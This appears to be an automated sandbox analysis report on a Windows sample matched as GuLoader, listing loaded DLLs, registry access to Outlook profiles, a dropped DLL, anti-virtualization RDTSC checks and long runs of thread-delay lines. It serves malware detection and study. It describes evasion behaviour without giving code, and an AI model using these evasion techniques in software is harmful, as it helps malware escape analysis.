Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 6ZoBPR3isG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 0_2_73F91B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73F91B5F

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Code function: 3_2_36AE8BE0 push esp; iretd

3_2_36AE8BE1

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

File created: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	API/Special instruction interceptor: Address: 3A76171
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	API/Special instruction interceptor: Address: 1EB6171

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	RDTSC instruction interceptor: First address: 3A3CFDF second address: 3A3CFDF instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 cmp al, bl 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F080C6CC815h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	RDTSC instruction interceptor: First address: 1E7CFDF second address: 1E7CFDF instructions: 0x00000000 rdtsc 0x00000002 test bx, ax 0x00000005 cmp al, bl 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F080C8B0E45h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Memory allocated: 34130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Memory allocated: 36130000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598795	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597920	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596603	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596494	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594608	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 594047	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Window / User API: threadDelayed 7624			Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Window / User API: threadDelayed 2221			Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe

API coverage: 2.5 %

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7424	Thread sleep count: 7624 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7424	Thread sleep count: 2221 > 30	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599561s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598686s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596494s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -594608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe TID: 7392	Thread sleep time: -594047s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_0040672B FindFirstFileW,FindClose,	3_2_0040672B
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405AFA

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598795	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597920	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596603	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596494	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Thread delayed: delay time: 595953	Jump to behavior
